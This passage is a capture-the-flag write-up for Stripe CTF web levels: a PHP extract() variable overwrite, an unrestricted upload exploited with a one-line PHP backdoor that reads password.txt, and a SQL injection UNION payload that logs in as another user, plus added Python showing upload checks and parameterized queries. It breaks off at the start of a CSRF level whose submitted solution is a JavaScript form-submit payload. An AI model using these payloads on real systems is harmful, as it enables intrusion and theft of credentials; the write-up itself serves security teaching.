<a name="n23" href="https://stripe-ctf.com/levels/1#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/1#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/1#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/1#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/1#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/1#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/1#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/1#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/1#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/1#n32"></a>32</pre>
</td>
<td>
<pre>&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;Guessing Game&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;h1&gt;Welcome to the Guessing Game!&lt;/h1&gt;
    &lt;p&gt;
      Guess the secret combination below, and if you get it right,
      you'll get the password to the next level!
    &lt;/p&gt;
    &lt;?php
      $filename = 'secret-combination.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "&lt;p&gt;How did you know the secret combination was" .
               " $combination!?&lt;/p&gt;";
          $next = file_get_contents('level02-password.txt');
          echo "&lt;p&gt;You've earned the password to the access Level 2:" .
               " $next&lt;/p&gt;";
        } else {
          echo "&lt;p&gt;Incorrect! The secret combination is not $attempt&lt;/p&gt;";
        }
      }
    ?&gt;
    &lt;form action="#" method="GET"&gt;
      &lt;p&gt;&lt;input type="text" name="attempt"&gt;&lt;/p&gt;
      &lt;p&gt;&lt;input type="submit" value="Guess!"&gt;&lt;/p&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>
<strong>Solution</strong>

This is a classic one. In the old days PHP had register_globals, which added GET and POST parameters as variables in the current scope, so anyone could manipulate your variables via a GET request.

You should never let untrusted user input into your code&#8217;s variable context. Here, on line 13, <strong>extract</strong> does exactly that: it takes every key/value pair from the $_GET array and makes it a variable in the current scope, overwriting any variable that already exists.

Since the only variable defined before it is $filename, and no other variable is used before being set (except for $attempt, which is intended to be user input and is therefore safe), $filename is the one to override here.

Just appending <strong>?filename=&amp;attempt=&amp;</strong> to the URL yields the result: $filename and $attempt both become empty strings, file_get_contents of an empty filename fails and trim() turns its result into an empty string, so $combination and $attempt match exactly.

<h3><strong>Challenge 2 &#8211; Local File Inclusion (LFI)</strong></h3>
<div id="content">

You completed this level in 282.218 seconds. The password was <code>eAepnsrRXY</code>.

The solution you submitted was:

<code>upload a file.php with echo file_get_contents("../password.txt"); browse to it voila.</code>

<hr />

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at <strong><a href="https://level02-3.stripe-ctf.com/user-shjuxdnipi" target="_blank">https://level02-3.stripe-ctf.com/user-shjuxdnipi</a></strong>. You may even be able to find the password for Level 3 by doing so.

The code for the Social Network can be obtained from <code>git clone https://level02-3.stripe-ctf.com/user-shjuxdnipi/level02-code</code>, and is also included below.

The contents of <code>index.php</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;?php
  session_start();

  if ($_FILES["dispic"]["error"] &gt; 0) {
    echo "&lt;p&gt;Error: " . $_FILES["dispic"]["error"] . "&lt;/p&gt;";
  }
  else
  {
    $dest_dir = "uploads/";
    $dest = $dest_dir . basename($_FILES["dispic"]["name"]);
    $src = $_FILES["dispic"]["tmp_name"];
    if (move_uploaded_file($src, $dest)) {
      $_SESSION["dispic_url"] = $dest;
      chmod($dest, 0644);
      echo "&lt;p&gt;Successfully uploaded your display picture.&lt;/p&gt;";
    }
  }

  $url = "https://upload.wikimedia.org/wikipedia/commons/f/f8/" .
         "Question_mark_alternate.svg";
  if (isset($_SESSION["dispic_url"])) {
    $url = $_SESSION["dispic_url"];
  }

?&gt;

&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;Welcome to the CTF!&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;center&gt;
      &lt;h1&gt;Welcome to the CTF Social Network!&lt;/h1&gt;
      &lt;div&gt;
        &lt;img src=&lt;?php echo $url; ?&gt; /&gt;
        &lt;?php
          if (!isset($_SESSION["dispic_url"])) {
            echo "&lt;p&gt;Oh, looks like you don't have a profile image" .
                 " -- upload one now!&lt;/p&gt;";
          }
        ?&gt;
        &lt;form action="" method="post" enctype="multipart/form-data"&gt;
          &lt;input type="file" name="dispic" size="40" /&gt;
          &lt;input type="submit" value="Upload!"&gt;
        &lt;/form&gt;

        &lt;p&gt;
           Password for Level 3 (accessible only to members of the club):
           &lt;a href="password.txt"&gt;password.txt&lt;/a&gt;
        &lt;/p&gt;
      &lt;/div&gt;
    &lt;/center&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
<div></div></td>
</tr>
</tbody>
</table>
</div>
&nbsp;

<strong>Solution</strong>

This one is easy but dangerous, and since we need it in the next challenges, stay sharp.

There&#8217;s a file <strong>password.txt</strong> that the webserver is configured to deny access to, meaning you cannot fetch it through the webserver in your browser. There&#8217;s also a dialog to upload your photo, which stores it in the <strong>./uploads/</strong> folder. No checking is done on the upload, so you can easily upload a PHP file, e.g. <strong>backdoor.php</strong>, containing the code:
<blockquote><code>&lt;?php echo file_get_contents("../password.txt");</code></blockquote>
Then just browse to ./uploads/backdoor.php and the password appears on the screen.

In fact anything can be uploaded here, even a backdoor shell that gives access to everything on this server, and we are going to need that later. This scenario shows up in many real-world cases.
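An added example (not the CTF's or the author's code) of the check that index.php lacks, written in Python rather than PHP: the client's filename is consulted only for an allowlisted image extension, the content must start with that type's magic bytes, and the stored name is chosen by the server. The allowlist, the sample PNG header and the sample script bytes are constructed here.

```python
import os
import secrets

# Constructed allowlist for a display picture: extension -> magic bytes the
# file content must begin with. Nothing the server could execute is on it.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Constructed sample uploads: the page's one-line PHP backdoor (the leading
# "<" written as \x3c so the feed's HTML stays clean), and a minimal PNG
# header (signature plus padding, enough for the check shown here).
PHP_BACKDOOR = b"\x3c?php echo file_get_contents('../password.txt');"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def check_display_picture(client_name, data):
    """Return the server-chosen filename to store an upload under, or None
    if the upload is rejected.

    index.php keeps basename($_FILES["dispic"]["name"]), which strips
    directories but leaves backdoor.php intact. Here the client name is only
    consulted for its extension, the content must start with the magic
    bytes of that type, and the stored name is random, so neither the name
    nor the bytes of a PHP file ever land in uploads/.
    """
    ext = os.path.splitext(os.path.basename(client_name))[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        return None  # .php, .phtml, no extension, ...: not an allowed image type
    if not data.startswith(magic):
        return None  # renamed script: claims .png but lacks the PNG signature
    return secrets.token_hex(16) + ext


def is_server_chosen_name(stored_name):
    """True if stored_name has the shape check_display_picture produces:
    32 hex characters plus an allowlisted extension."""
    stem, ext = os.path.splitext(stored_name)
    return (len(stem) == 32
            and all(c in "0123456789abcdef" for c in stem)
            and ext in ALLOWED_TYPES)
```

Naming the file server-side is only half of it; the uploads/ directory should also be served with script execution disabled, so that even a misclassified file is returned as bytes rather than run.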

&nbsp;
<h3><strong>Challenge 3 &#8211; SQL Injection Union Bypassing</strong></h3>
You completed this level in 1333.633 seconds. The password was <code>LDeVchKFIV</code>.

The solution you submitted was:

<code>' and 1=0 union all select (select id from users where username='bob'),'d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1','' -- enter this as username and "pass" as password</code>

<hr />

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like <a href="http://www.oracle.com/us/technologies/linux/ubreakable-enterprise-kernel-linux-173350.html">Unbreakable Linux</a>). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.

A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at <strong><a href="https://level03-1.stripe-ctf.com/user-uajtfcvbxh" target="_blank">https://level03-1.stripe-ctf.com/user-uajtfcvbxh</a></strong>. As usual, you can fetch the code for the level (and some sample data) via <code>git clone https://level03-1.stripe-ctf.com/user-uajtfcvbxh/level03-code</code>, or you can read the code below.

The source of the server, <code>secretvault.py</code>, is:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/3#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/3#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/3#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/3#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/3#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/3#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/3#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/3#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/3#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/3#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/3#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/3#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/3#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/3#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/3#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/3#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/3#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/3#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/3#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/3#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/3#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/3#n22"></a>22
<a name="n23" href="https://stripe-ctf.com/levels/3#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/3#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/3#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/3#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/3#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/3#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/3#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/3#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/3#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/3#n32"></a>32
<a name="n33" href="https://stripe-ctf.com/levels/3#n33"></a>33
<a name="n34" href="https://stripe-ctf.com/levels/3#n34"></a>34
<a name="n35" href="https://stripe-ctf.com/levels/3#n35"></a>35
<a name="n36" href="https://stripe-ctf.com/levels/3#n36"></a>36
<a name="n37" href="https://stripe-ctf.com/levels/3#n37"></a>37
<a name="n38" href="https://stripe-ctf.com/levels/3#n38"></a>38
<a name="n39" href="https://stripe-ctf.com/levels/3#n39"></a>39
<strong><a name="n40" href="https://stripe-ctf.com/levels/3#n40"></a>40</strong>
<a name="n41" href="https://stripe-ctf.com/levels/3#n41"></a>41
<a name="n42" href="https://stripe-ctf.com/levels/3#n42"></a>42
<a name="n43" href="https://stripe-ctf.com/levels/3#n43"></a>43
<a name="n44" href="https://stripe-ctf.com/levels/3#n44"></a>44
<a name="n45" href="https://stripe-ctf.com/levels/3#n45"></a>45
<a name="n46" href="https://stripe-ctf.com/levels/3#n46"></a>46
<a name="n47" href="https://stripe-ctf.com/levels/3#n47"></a>47
<a name="n48" href="https://stripe-ctf.com/levels/3#n48"></a>48
<a name="n49" href="https://stripe-ctf.com/levels/3#n49"></a>49
<strong><a name="n50" href="https://stripe-ctf.com/levels/3#n50"></a>50</strong>
<a name="n51" href="https://stripe-ctf.com/levels/3#n51"></a>51
<a name="n52" href="https://stripe-ctf.com/levels/3#n52"></a>52
<a name="n53" href="https://stripe-ctf.com/levels/3#n53"></a>53
<a name="n54" href="https://stripe-ctf.com/levels/3#n54"></a>54
<a name="n55" href="https://stripe-ctf.com/levels/3#n55"></a>55
<a name="n56" href="https://stripe-ctf.com/levels/3#n56"></a>56
<a name="n57" href="https://stripe-ctf.com/levels/3#n57"></a>57
<a name="n58" href="https://stripe-ctf.com/levels/3#n58"></a>58
<a name="n59" href="https://stripe-ctf.com/levels/3#n59"></a>59
<strong><a name="n60" href="https://stripe-ctf.com/levels/3#n60"></a>60</strong>
<a name="n61" href="https://stripe-ctf.com/levels/3#n61"></a>61
<a name="n62" href="https://stripe-ctf.com/levels/3#n62"></a>62
<a name="n63" href="https://stripe-ctf.com/levels/3#n63"></a>63
<a name="n64" href="https://stripe-ctf.com/levels/3#n64"></a>64
<a name="n65" href="https://stripe-ctf.com/levels/3#n65"></a>65
<a name="n66" href="https://stripe-ctf.com/levels/3#n66"></a>66
<a name="n67" href="https://stripe-ctf.com/levels/3#n67"></a>67
<a name="n68" href="https://stripe-ctf.com/levels/3#n68"></a>68
<a name="n69" href="https://stripe-ctf.com/levels/3#n69"></a>69
<strong><a name="n70" href="https://stripe-ctf.com/levels/3#n70"></a>70</strong>
<a name="n71" href="https://stripe-ctf.com/levels/3#n71"></a>71
<a name="n72" href="https://stripe-ctf.com/levels/3#n72"></a>72
<a name="n73" href="https://stripe-ctf.com/levels/3#n73"></a>73
<a name="n74" href="https://stripe-ctf.com/levels/3#n74"></a>74
<a name="n75" href="https://stripe-ctf.com/levels/3#n75"></a>75
<a name="n76" href="https://stripe-ctf.com/levels/3#n76"></a>76
<a name="n77" href="https://stripe-ctf.com/levels/3#n77"></a>77
<a name="n78" href="https://stripe-ctf.com/levels/3#n78"></a>78
<a name="n79" href="https://stripe-ctf.com/levels/3#n79"></a>79
<strong><a name="n80" href="https://stripe-ctf.com/levels/3#n80"></a>80</strong>
<a name="n81" href="https://stripe-ctf.com/levels/3#n81"></a>81
<a name="n82" href="https://stripe-ctf.com/levels/3#n82"></a>82
<a name="n83" href="https://stripe-ctf.com/levels/3#n83"></a>83
<a name="n84" href="https://stripe-ctf.com/levels/3#n84"></a>84
<a name="n85" href="https://stripe-ctf.com/levels/3#n85"></a>85
<a name="n86" href="https://stripe-ctf.com/levels/3#n86"></a>86
<a name="n87" href="https://stripe-ctf.com/levels/3#n87"></a>87
<a name="n88" href="https://stripe-ctf.com/levels/3#n88"></a>88
<a name="n89" href="https://stripe-ctf.com/levels/3#n89"></a>89
<strong><a name="n90" href="https://stripe-ctf.com/levels/3#n90"></a>90</strong>
<a name="n91" href="https://stripe-ctf.com/levels/3#n91"></a>91
<a name="n92" href="https://stripe-ctf.com/levels/3#n92"></a>92
<a name="n93" href="https://stripe-ctf.com/levels/3#n93"></a>93
<a name="n94" href="https://stripe-ctf.com/levels/3#n94"></a>94
<a name="n95" href="https://stripe-ctf.com/levels/3#n95"></a>95
<a name="n96" href="https://stripe-ctf.com/levels/3#n96"></a>96
<a name="n97" href="https://stripe-ctf.com/levels/3#n97"></a>97
<a name="n98" href="https://stripe-ctf.com/levels/3#n98"></a>98
<a name="n99" href="https://stripe-ctf.com/levels/3#n99"></a>99
<strong><a name="n100" href="https://stripe-ctf.com/levels/3#n100"></a>100</strong>
<a name="n101" href="https://stripe-ctf.com/levels/3#n101"></a>101
<a name="n102" href="https://stripe-ctf.com/levels/3#n102"></a>102
<a name="n103" href="https://stripe-ctf.com/levels/3#n103"></a>103
<a name="n104" href="https://stripe-ctf.com/levels/3#n104"></a>104</pre>
</td>
<td>
<pre>#!/usr/bin/env python
#
# Welcome to the Secret Safe!
#
# - users/users.db stores authentication info with the schema:
#
# CREATE TABLE users (
#   id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );
#
# - For extra security, the dictionary of secrets lives
#   data/secrets.json (so a compromise of the database won't
#   compromise the secrets themselves)

import flask
import hashlib
import json
import logging
import os
import sqlite3
import subprocess
import sys
from werkzeug import debug

# Generate test data when running locally
data_dir = os.path.join(os.path.dirname(__file__), 'data')
if not os.path.exists(data_dir):
    import generate_data
    os.mkdir(data_dir)
    generate_data.main(data_dir, 'dummy-password', 'dummy-proof', 'dummy-plans')

secrets = json.load(open(os.path.join(data_dir, 'secrets.json')))
index_html = open('index.html').read()
app = flask.Flask(__name__)

# Turn on backtraces, but turn off code execution (that'd be an easy level!)
app.config['PROPAGATE_EXCEPTIONS'] = True
app.wsgi_app = debug.DebuggedApplication(app.wsgi_app, evalex=False)

app.logger.addHandler(logging.StreamHandler(sys.stderr))
# use persistent entropy file for secret_key
app.secret_key = open(os.path.join(data_dir, 'entropy.dat')).read()

# Allow setting url_root if needed
try:
    from local_settings import url_root
except ImportError:
    pass

def absolute_url(path):
    return url_root + path

@app.route('/')
def index():
    try:
        user_id = flask.session['user_id']
    except KeyError:
        return index_html
    else:
        secret = secrets[str(user_id)]
        return (u'Welcome back! Your secret is: "{0}"'.format(secret) +
                u' (&lt;a href="./logout"&gt;Log out&lt;/a&gt;)\n')

@app.route('/logout')
def logout():
    flask.session.pop('user_id', None)
    return flask.redirect(absolute_url('/'))

@app.route('/login', methods=['POST'])
def login():
    username = flask.request.form.get('username')
    password = flask.request.form.get('password')

    if not username:
        return "Must provide username\n"

    if not password:
        return "Must provide password\n"

    conn = sqlite3.connect(os.path.join(data_dir, 'users.db'))
    cursor = conn.cursor()

    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

    flask.session['user_id'] = user_id
    return flask.redirect(absolute_url('/'))

if __name__ == '__main__':
    # In development: app.run(debug=True)
    app.run()</pre>
</td>
</tr>
</tbody>
</table>
And here&#8217;s <code>index.html</code>, the HTML file it&#8217;s serving:
<table>
<tbody>
<tr>
<td>
<pre>&lt;html&gt;
  &lt;body&gt;
    &lt;p&gt;
      Welcome to the Secret Safe, a place to guard your most
      precious secrets! To retreive your secrets, log in below.
    &lt;/p&gt;

    &lt;p&gt;The current users of the system store the following secrets:&lt;/p&gt;

    &lt;ul&gt;
      &lt;li&gt;bob: Stores the password to access level 04&lt;/li&gt;
      &lt;li&gt;eve: Stores the proof that P = NP &lt;/li&gt;
      &lt;li&gt;mallory: Stores the plans to a perpetual motion machine &lt;/li&gt;
    &lt;/ul&gt;

    &lt;p&gt;
      You should use it too!
      &lt;a href="http://www.youtube.com/watch?v=oHg5SJYRHA0"&gt;Contact us&lt;/a&gt;
      to request a beta invite.
    &lt;/p&gt;

    &lt;form method="POST" action="./login"&gt;
      &lt;p&gt;
        &lt;label for="username"&gt;Username:&lt;/label&gt;
        &lt;input type="text" name="username" id="username"&gt;
      &lt;/p&gt;
      &lt;p&gt;
        &lt;label for="password"&gt;Password:&lt;/label&gt;
        &lt;input type="password" name="password" id="password"&gt;
      &lt;/p&gt;
      &lt;input type="submit" value="Recover your secrets now!"&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;</pre>
</td>
</tr>
</tbody>
</table>
&nbsp;

<strong>Solution</strong>

This is a Python (Flask) powered webserver. You need to read <strong>bob</strong>&#8217;s secret here. The authentication mechanism itself is sound, as it hashes and salts passwords. Lines 86 and 87, however, build a query without a prepared statement, so you can simply inject into it. It looks like a prepared statement, but the <code>{0}</code> is a Python format-string placeholder (<code>str.format</code>), so the username is pasted straight into the SQL text.

Lines 93-97 then check the validity of the password: the salt is appended (user_entered_password + salt), SHA256 is applied, the digest is converted to hex and compared against the hex hash stored in the database.

All we need to do is make this query return bob&#8217;s user_id, the SHA256 of <strong>foo</strong>, and an empty string as the salt. Then we can simply provide the password <strong>foo</strong> and it will be accepted for bob!

A simple union bypass will do that. First compute SHA256(&#8220;pass&#8221;) (any of the countless free online tools will do), then enter <strong>pass</strong> as the password and the following injection as the username:
<blockquote><code>' and 1=0 union all select (select id from users where username='bob'),'d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1','' -- </code></blockquote>
The above is a single line. It turns the whole query into:
<pre>SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' and 1=0 union all select (select id from users where username='bob'),'d74ff0ee8da3b9806b18c877dbf29bbde50b5bd8e4dad7a3a725000feb82e8f1','' -- ' LIMIT 1</pre>
Since the first SELECT returns nothing (because of the AND 1=0 condition), the UNION hands over to the second query, whose result becomes the whole result set. The second query returns bob_user_id, SHA256(&#8216;pass&#8217;) and an empty salt, in that order.

The <code>--</code> part makes sure that everything after our injection is treated as a comment and has no effect (so it does not cause an SQL error).

Now you are logged in as bob, and you can simply view his secret.
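The injection and the hash check described above, as an added example (not the CTF's own code): a Python rendering of the login path from secretvault.py against an in-memory SQLite table, next to the parameterized query that closes the hole. The table layout follows the comment at the top of secretvault.py except that the id column is INTEGER; bob's password and salt are constructed here.

```python
import hashlib
import sqlite3

# Constructed sample data: bob's real password and salt are what the
# database holds; the attacker never learns them.
BOB_PASSWORD = "correct-horse"
BOB_SALT = "s4lt"

# The attacker's chosen password and its SHA-256, which is the hex value
# used in the injection on the page (SHA256("pass") = d74ff0ee...).
ATTACKER_PASSWORD = "pass"
ATTACKER_HASH = hashlib.sha256(ATTACKER_PASSWORD.encode()).hexdigest()

# The username submitted on the page, rebuilt from ATTACKER_HASH: the first
# SELECT is emptied by "and 1=0", the UNION supplies bob's id with the
# attacker's hash and an empty salt, and "--" comments out the trailing
# "' LIMIT 1" that the template appends.
INJECTED_USERNAME = (
    "' and 1=0 union all select (select id from users where username='bob'),"
    "'" + ATTACKER_HASH + "','' -- "
)


def make_db():
    """In-memory users table (INTEGER id, since SQLite's AUTOINCREMENT
    requires INTEGER PRIMARY KEY) holding one real user, bob."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT, "
        "username VARCHAR(255), password_hash VARCHAR(255), salt VARCHAR(255))"
    )
    hashed = hashlib.sha256((BOB_PASSWORD + BOB_SALT).encode()).hexdigest()
    conn.execute(
        "INSERT INTO users (username, password_hash, salt) VALUES (?, ?, ?)",
        ("bob", hashed, BOB_SALT),
    )
    return conn


def verify(res, password):
    """Lines 93-97 of secretvault.py: sha256(password + salt) in hex must
    equal the stored hash. Returns the user id on success, else None."""
    user_id, password_hash, salt = res
    if hashlib.sha256((password + salt).encode()).hexdigest() != password_hash:
        return None
    return user_id


def login_vulnerable(conn, username, password):
    """Lines 86-87 of secretvault.py: str.format pastes the username into
    the SQL text, so the row that comes back is whatever the input dictates."""
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    res = conn.execute(query).fetchone()
    return verify(res, password) if res else None


def login_parameterized(conn, username, password):
    """The fix: bind the username as a parameter. SQLite then compares the
    column against the whole injection string as one literal, finds no
    such user, and the login fails."""
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = ? LIMIT 1"""
    res = conn.execute(query, (username,)).fetchone()
    return verify(res, password) if res else None


def demo():
    """Run both logins against the same database and report the outcomes."""
    conn = make_db()
    bob_id = conn.execute("SELECT id FROM users WHERE username = 'bob'").fetchone()[0]
    return {
        "bob_id": bob_id,
        "legit": login_vulnerable(conn, "bob", BOB_PASSWORD),
        "wrong_password": login_vulnerable(conn, "bob", "guess"),
        "injected_vulnerable": login_vulnerable(conn, INJECTED_USERNAME, ATTACKER_PASSWORD),
        "injected_parameterized": login_parameterized(conn, INJECTED_USERNAME, ATTACKER_PASSWORD),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```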

<!--more-->
<h3><strong>Challenge 4 &#8211; Simple CSRF</strong></h3>
You completed this level in 1182.214 seconds. The password was <code>XtoqkPHnaM</code>.

The solution you submitted was:

<code>create base user abx create a user with this pass: var x=document.forms[0]; x.to.value='abx'; x.amount.value='1'; x.submit(); send karma to fountain with that one, wait one minute. login to abx</code>

<hr />

The Karma Trader is the world&#8217;s best way to reward people for good deeds: <strong><a href="https://level04-4.stripe-ctf.com/user-bivlappzeh" target="_blank">https://level04-4.stripe-ctf.com/user-bivlappzeh</a></strong>. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you&#8217;re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her. The very active user <strong>karma_fountain</strong> has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for <strong>karma_fountain</strong>&#8217;s account will give you access to Level 5. You can obtain the full, runnable source for the Karma Trader from <code>git clone https://level04-4.stripe-ctf.com/user-bivlappzeh/level04-code</code>. We&#8217;ve included the most important files below.

The contents of <code>srv.rb</code>:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/4#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/4#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/4#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/4#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/4#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/4#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/4#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/4#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/4#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/4#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/4#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/4#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/4#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/4#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/4#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/4#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/4#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/4#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/4#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/4#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/4#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/4#n22"></a>22
<a name="n23" href="https://stripe-ctf.com/levels/4#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/4#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/4#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/4#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/4#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/4#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/4#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/4#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/4#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/4#n32"></a>32
<a name="n33" href="https://stripe-ctf.com/levels/4#n33"></a>33
<a name="n34" href="https://stripe-ctf.com/levels/4#n34"></a>34
<a name="n35" href="https://stripe-ctf.com/levels/4#n35"></a>35
<a name="n36" href="https://stripe-ctf.com/levels/4#n36"></a>36
<a name="n37" href="https://stripe-ctf.com/levels/4#n37"></a>37
<a name="n38" href="https://stripe-ctf.com/levels/4#n38"></a>38
<a name="n39" href="https://stripe-ctf.com/levels/4#n39"></a>39
<strong><a name="n40" href="https://stripe-ctf.com/levels/4#n40"></a>40</strong>
<a name="n41" href="https://stripe-ctf.com/levels/4#n41"></a>41
<a name="n42" href="https://stripe-ctf.com/levels/4#n42"></a>42
<a name="n43" href="https://stripe-ctf.com/levels/4#n43"></a>43
<a name="n44" href="https://stripe-ctf.com/levels/4#n44"></a>44
<a name="n45" href="https://stripe-ctf.com/levels/4#n45"></a>45
<a name="n46" href="https://stripe-ctf.com/levels/4#n46"></a>46
<a name="n47" href="https://stripe-ctf.com/levels/4#n47"></a>47
<a name="n48" href="https://stripe-ctf.com/levels/4#n48"></a>48
<a name="n49" href="https://stripe-ctf.com/levels/4#n49"></a>49
<strong><a name="n50" href="https://stripe-ctf.com/levels/4#n50"></a>50</strong>
<a name="n51" href="https://stripe-ctf.com/levels/4#n51"></a>51
<a name="n52" href="https://stripe-ctf.com/levels/4#n52"></a>52
<a name="n53" href="https://stripe-ctf.com/levels/4#n53"></a>53
<a name="n54" href="https://stripe-ctf.com/levels/4#n54"></a>54
<a name="n55" href="https://stripe-ctf.com/levels/4#n55"></a>55
<a name="n56" href="https://stripe-ctf.com/levels/4#n56"></a>56
<a name="n57" href="https://stripe-ctf.com/levels/4#n57"></a>57
<a name="n58" href="https://stripe-ctf.com/levels/4#n58"></a>58
<a name="n59" href="https://stripe-ctf.com/levels/4#n59"></a>59
<strong><a name="n60" href="https://stripe-ctf.com/levels/4#n60"></a>60</strong>
<a name="n61" href="https://stripe-ctf.com/levels/4#n61"></a>61
<a name="n62" href="https://stripe-ctf.com/levels/4#n62"></a>62
<a name="n63" href="https://stripe-ctf.com/levels/4#n63"></a>63
<a name="n64" href="https://stripe-ctf.com/levels/4#n64"></a>64
<a name="n65" href="https://stripe-ctf.com/levels/4#n65"></a>65
<a name="n66" href="https://stripe-ctf.com/levels/4#n66"></a>66
<a name="n67" href="https://stripe-ctf.com/levels/4#n67"></a>67
